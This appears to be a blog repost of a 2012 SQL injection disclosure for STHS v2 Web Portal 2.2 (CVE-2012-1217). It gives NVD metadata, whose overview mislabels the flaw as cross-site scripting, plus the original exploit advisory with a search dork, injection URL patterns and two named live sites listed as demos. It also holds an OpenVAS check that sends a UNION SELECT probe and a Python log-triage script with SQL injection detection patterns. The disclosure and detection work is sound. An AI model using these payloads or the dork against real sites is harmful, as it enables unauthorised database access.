CVE-2012-1217 : STHS v2 Web Portal ‘team’ parameter Multiple SQL Injection Vulnerabilities
Just updated the old story of this exploit; this CVE was created by me 2 years ago. Check it on PacketStorm Security.
Overview
Multiple cross-site scripting (XSS) vulnerabilities in STHS v2 Web Portal 2.2 allow remote attackers to inject arbitrary web script or HTML via the team parameter to (1) prospects.php, (2) prospect.php, or (3) team.php.
- CVE ID: CVE-2012-1217 (see also the NVD entry)
- Bugtraq ID: 51991
- ISS X-Force ID: 73154
- Related OSVDB IDs: 79598, 79600
Impact
- CVSS Severity (version 2.0):
  - CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
  - Impact Subscore: 2.9
  - Exploitability Subscore: 8.6
- CVSS Version 2 Metrics:
  - Access Vector: Network exploitable; victim must voluntarily interact with attack mechanism
  - Access Complexity: Medium
  - Authentication: Not required to exploit
  - Impact Type: Allows unauthorized modification
References to Advisories, Solutions, and Tools
- XF: sths-prospects-team-sql-injection(73154), http://xforce.iss.net/xforce/xfdb/73154
- BID: 51991, http://www.securityfocus.com/bid/51991
- MISC: http://packetstormsecurity.org/files/109665/STHS-v2-Web-Portal-2.2-SQL-Injection.html
- MISC: http://0nto.wordpress.com/2012/02/13/sths-v2-web-portal-2-2-sql-injection-vulnerabilty/
- CVE Standard Vulnerability Entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1217
=================================================
STHS v2 Web Portal 2.2 SQL Injection Vulnerability
=================================================

[Dis9.com ASCII-art banner]
>> The Underground Exploitation Team
[+] Site : http://www.Dis9.com
I'm Liyan Oz, Member from 1337 DataBase

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#
# Author    : Liyan Oz
# Title     : STHS v2 Web Portal 2.2 SQL Injection Vulnerability
# Vendor    : http://www.simhl.net
# Date      : 10/02/2012
# Risk      : Normal
# Tested On : Backtrack Liyan Oz Edition
# Contact   : ariestiyansyah.rizky@gmail.com
# Home      : http://0nto.wordpress.com/
# Dork      : "powered by SIMHL.net"
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#
# Exploit :
#   http://www.site.com/prospects.php?team=[SQLi]'
#   http://www.site.org/prospect.php?team=[SQLi]'
#   http://www.site.net/team.php?team=[SQLi]'
#
# Demo :
#   http://lnhs2.hostpo.net/prospect.php?team=1'
#   http://www.lchv.biz/prospects.php?team=17'
#
# Greetz to
# ========================================================================
# = My Lovely Junia Astri Damayanti =
# = Dis9 The Underground Exploitation Team [at] www.dis9.com =
# - Kedans Dz - Blackrootkit - Kalashinkov3 - KnockOut - Black-ID -
# - Kowalski Howard - 7h1nkz3r0 - ettack - Ackrootkit - ph0n7ric -
# - xi4ojin - Nimda - Killer - Dz - 2ext01 - Aoi Sora - X1 - brk -
# - Indonesian Backtrack Team , El N4ck0 , and all my friend ^_^ -
#=======================================================================
Update: the OpenVAS detection script written by Michael Meyer (Greenbone Networks) for this issue follows.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_STHS_51991.nasl 12 2013-10-27 11:15:33Z jan $
#
# STHS v2 Web Portal 'team' parameter Multiple SQL Injection Vulnerabilities
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

include("revisions-lib.inc");

tag_summary = "STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because
the application fails to sufficiently sanitize user-supplied data before using it in an
SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.

STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected.";

if (description)
{
  script_id(103421);
  script_bugtraq_id(51991);
  script_cve_id("CVE-2012-1217");
  script_version ("$Revision: 12 $");
  script_name("STHS v2 Web Portal 'team' parameter Multiple SQL Injection Vulnerabilities");

  desc = " Summary: " + tag_summary;

  script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/51991");
  script_xref(name : "URL" , value : "http://xforce.iss.net/xforce/xfdb/73154");
  script_xref(name : "URL" , value : "http://www.simhl.net/");
  script_xref(name : "URL" , value : "http://0nto.wordpress.com/2012/02/13/sths-v2-web-portal-2-2-sql-injection-vulnerabilty/");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"risk_factor", value:"Medium");
  script_tag(name:"last_modification", value:"$Date: 2013-10-27 12:15:33 +0100 (Sun, 27 Oct 2013) $");
  script_tag(name:"creation_date", value:"2012-02-15 11:22:27 +0100 (Wed, 15 Feb 2012)");
  script_description(desc);
  script_summary("Determine if installed STHS is vulnerable");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
  script_dependencies("find_service.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  if (revcomp(a: OPENVAS_VERSION, b: "6.0+beta5") >= 0) {
    script_tag(name : "summary" , value : tag_summary);
  }
  exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
include("global_settings.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Stage 1: fingerprint an STHS install by the vendor footer on home.php.
  url = string(dir, "/home.php");
  if(http_vuln_check(port:port, url:url,pattern:"Site powered by.*SIMHL.net")) {
    # Stage 2: inject a UNION SELECT naming a column that cannot exist. A raw MySQL
    # "Unknown column" error in the response proves the 'team' value reaches the query unsanitized.
    url = string(dir, "/prospects.php?team=-1%20union%20select%20openvas_sqli_test,saf,3,4,5,6,7,8,9,10,11,12");
    if(http_vuln_check(port:port, url:url,pattern:"Unknown column 'openvas_sqli_test' in 'field list'")) {
      security_warning(port:port);
      exit(0);
    }
  }
}

exit(0);
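As an added example in Python (not code from the advisory, the NVD entry or the OpenVAS script), a defender-side log triage for this issue: it flags requests to the three affected scripts whose team parameter carries SQL syntax, separates the Greenbone probe (recognisable by the openvas_sqli_test column name it injects) from other attempts, and recognises the MySQL "Unknown column" error the check keys on. It assumes Apache common/combined log format; all log lines and response bodies are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Script names the advisory lists as taking the injectable 'team' parameter.
AFFECTED_SCRIPTS = {"prospects.php", "prospect.php", "team.php"}

# SQL syntax that has no business in a parameter meant to hold a team id.
# Deliberately simple triage rule, not a WAF: tune it if team names may contain quotes.
SQLI_INDICATORS = re.compile(
    r"'|--|/\*|\bunion\b.*\bselect\b|\bor\b\s+\d+\s*=\s*\d+", re.IGNORECASE)

# Column name the Greenbone check injects; seeing it marks a scanner probe.
SCANNER_MARKER = "openvas_sqli_test"

# Raw MySQL error the check expects back from a vulnerable install.
MYSQL_UNKNOWN_COLUMN = re.compile(r"Unknown column '([^']+)' in 'field list'")

# Apache common/combined log format (assumed); only the request target is needed here.
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d{3}')

def classify_request(log_line: str) -> str:
    """Return 'ignore', 'clean', 'sqli' or 'scanner-probe' for one access-log line."""
    m = LOG_RE.match(log_line)
    if not m:
        return "ignore"
    parts = urlsplit(m.group("target"))
    # Compare the script name only, so installs under a sub-directory are covered.
    if parts.path.rsplit("/", 1)[-1] not in AFFECTED_SCRIPTS:
        return "ignore"
    # parse_qs percent-decodes, so %27 and %20 are already a quote and a space here.
    for value in parse_qs(parts.query, keep_blank_values=True).get("team", []):
        if SCANNER_MARKER in value:
            return "scanner-probe"
        if SQLI_INDICATORS.search(value):
            return "sqli"
    return "clean"

def response_leaks_sql_error(body: str):
    """Return the column named in an echoed MySQL 'Unknown column' error, or None."""
    m = MYSQL_UNKNOWN_COLUMN.search(body)
    return m.group(1) if m else None

# Constructed sample log lines (RFC 5737 addresses); the last one is not an affected script.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Feb/2012:10:01:02 +0100] "GET /team.php?team=17 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Feb/2012:10:01:07 +0100] "GET /prospects.php?team=17%27 HTTP/1.1" 500 310',
    '198.51.100.2 - - [15/Feb/2012:11:22:27 +0100] "GET /portal/prospects.php?team=-1%20union%20select%20openvas_sqli_test,saf,3,4,5,6,7,8,9,10,11,12 HTTP/1.1" 200 844',
    '203.0.113.5 - - [13/Feb/2012:10:02:00 +0100] "GET /index.php?team=1%27 HTTP/1.1" 200 2048',
]
```

Running `classify_request` over `SAMPLE_LOG` yields clean, sqli, scanner-probe and ignore in that order; a 500 status on a flagged line, or `response_leaks_sql_error` returning a column name from the served page, is the strongest sign the injection reached the database.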